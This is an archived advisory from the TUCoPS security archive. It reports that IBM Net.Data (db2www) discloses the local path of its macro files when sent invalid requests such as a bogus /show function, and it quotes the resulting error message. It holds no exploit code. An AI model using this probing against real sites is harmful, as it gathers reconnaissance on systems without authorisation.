Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web :: Apps :: netdat.htm

IBM Net.Data disclose local path of server files



    IBM Net.Data


    Chad Kalmes found following.   Not sure if this  is exactly a  new
    issue or not, but IBM's Net.Data package (often used in conjuction
    with  NetCommerce3  and  db2www)  will  disclose the local path of
    server files if  fed improper requests.   This software is  in use
    on a variety of sites, including several online-shopping locales.

    Example (from  IBM's own  pages):   By issuing  a /report  request
    from the document.d2w file, the db2www package builds and displays
    the proper HTML page, as requested.

    Valid call:

    yields proper web page.

    However, by issuing a bad /show request (or /garbarge,  /whatever,
    etc.),  the  package  outputs  an  error message showing the local
    path  to  the  d2w  macro  file,  assuming no valid /show function
    exists within the .d2w file.

    Invalid call:


        DTWP029E: Net.Data is unable to locate the HTML block SHOW in file /projects/www/netdata/macro/software/library/document.d2w.

    While not  a security  problem per  se, it  still yields increased
    information  about  the  local  host  system.   This  'feature' or
    'flaw' is present  on both *NIX  and WIN versions  of the software
    (unsure about OS2) and every  instance I've found on the  Internet
    is subject  to this  disclosure.   Path disclosure vulnerabilities
    have been highlighted in other packages.


    Nothing yet.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH